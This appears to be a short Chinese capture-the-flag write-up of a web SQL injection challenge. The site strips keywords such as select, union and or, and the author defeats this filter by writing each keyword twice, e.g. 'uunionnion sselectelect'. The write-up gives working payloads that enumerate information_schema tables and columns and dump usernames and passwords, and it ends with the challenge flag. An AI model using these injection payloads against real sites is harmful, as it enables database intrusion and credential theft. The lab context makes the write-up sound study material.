打开题目
发现上面写自从前几次网站被日,我对我的网站做了严格的过滤,你们这些黑客死心吧!!!
所以我们看一下是怎么过滤的吧!输入select
看来是把一些关键词过滤成了空格,可以使用经典的双写绕过
经检查,发现select,from,where,union
查询表列数、显示位、版本、用户什么的就省略了,
查询表名1' uunionnion sselectelect 1,2,group_concat(table_name) frfromom information_schema.tables wwherehere table_schema=database()#
结果显示Table 'infmation_schema.tables' doesn't exist
原来or也被过滤了,修改为1' uunionnion sselectelect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables wwherehere table_schema=database()#
目测flag在b4bsql
同理,查询列名1' uunionnion seselectlect 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wwherehere table_name='b4bsql'#
我们查询一下username和password1' uunionnion seselectlect 1,group_concat(username),group_concat(passwoorrd) frfromom b4bsql#
注意password需要写成passwoorrd
拿到flag: flag{e98048b1-6880-42d7-bdde-3bad3153e0f3}